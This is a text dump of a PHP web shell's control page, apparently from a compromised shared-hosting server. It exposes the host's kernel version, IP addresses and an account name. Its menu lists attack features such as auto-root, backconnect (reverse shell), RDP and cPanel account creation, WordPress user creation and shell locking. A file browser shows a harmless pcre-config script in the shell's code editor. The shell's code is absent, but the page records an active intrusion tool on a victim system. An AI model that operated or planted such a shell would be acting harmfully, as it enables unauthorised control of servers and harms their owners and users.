Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.146.107.144
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
pcre802 /
usr /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
pcre-config
1.62
KB
-rwxr-xr-x
pcregrep
38.49
KB
-rwxr-xr-x
pcretest
53.25
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pcre-config
#!/bin/sh prefix=/opt/alt/pcre802/usr exec_prefix=/opt/alt/pcre802/usr exec_prefix_set=no if test yes = yes ; then usage="Usage: pcre-config [--prefix] [--exec-prefix] [--version] [--libs] [--libs-posix] [--libs-cpp] [--cflags] [--cflags-posix]" else usage="Usage: pcre-config [--prefix] [--exec-prefix] [--version] [--libs] [--libs-posix] [--cflags] [--cflags-posix]" fi if test $# -eq 0; then echo "${usage}" 1>&2 exit 1 fi libR= case `uname -s` in *SunOS*) libR=" -R/opt/alt/pcre802/usr/lib64" ;; *BSD*) libR=" -Wl,-R/opt/alt/pcre802/usr/lib64" ;; esac while test $# -gt 0; do case "$1" in -*=*) optarg=`echo "$1" | sed 's/[-_a-zA-Z0-9]*=//'` ;; *) optarg= ;; esac case $1 in --prefix=*) prefix=$optarg if test $exec_prefix_set = no ; then exec_prefix=$optarg fi ;; --prefix) echo $prefix ;; --exec-prefix=*) exec_prefix=$optarg exec_prefix_set=yes ;; --exec-prefix) echo $exec_prefix ;; --version) echo 8.02 ;; --cflags | --cflags-posix) if test /opt/alt/pcre802/usr/include != /usr/include ; then includes=-I/opt/alt/pcre802/usr/include fi echo $includes ;; --libs-posix) echo -L/opt/alt/pcre802/usr/lib64$libR -lpcreposix -lpcre ;; --libs) echo -L/opt/alt/pcre802/usr/lib64$libR -lpcre ;; --libs-cpp) if test yes = yes ; then echo -L/opt/alt/pcre802/usr/lib64$libR -lpcrecpp -lpcre else echo "${usage}" 1>&2 fi ;; *) echo "${usage}" 1>&2 exit 1 ;; esac shift done
Close